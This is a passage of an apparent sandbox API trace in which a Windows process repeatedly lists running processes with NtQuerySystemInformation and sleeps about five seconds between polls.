NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.900] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.901] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.909] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.920] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.930] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.937] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.946] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.954] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.961] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.969] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.978] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.987] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.995] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.003] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.010] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.017] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.025] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.026] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.032] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.033] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.034] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.040] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.046] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.053] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.078] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, 